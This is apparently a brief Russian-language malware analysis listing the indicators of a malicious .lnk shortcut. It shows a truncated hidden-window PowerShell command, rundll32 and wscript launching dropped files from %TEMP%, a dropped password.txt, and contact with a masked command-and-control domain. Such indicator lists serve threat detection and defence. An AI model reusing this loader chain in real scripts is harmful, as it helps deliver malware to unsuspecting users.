Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -c function getShapePath(){$lnkpath = Get-ChildItem *.lnk;$lnkpath = $lnkpath| where-object {$_.length -eq 0x000017B1} ;$lnkpath = $lnkpath| Select-Object -ExpandProperty Na...
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %TEMP%\<Имя файла>
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmp1797691170.vbs"
- %TEMP%\<Имя файла>
- %TEMP%\tmp1797691170.vbs
- %APPDATA%\microsoft\windows\templates\password.txt
- 'ho####.getenjoyment.net':80
- http://ho####.getenjoyment.net/denak/info/list.php?qu#####
- DNS ASK ho####.getenjoyment.net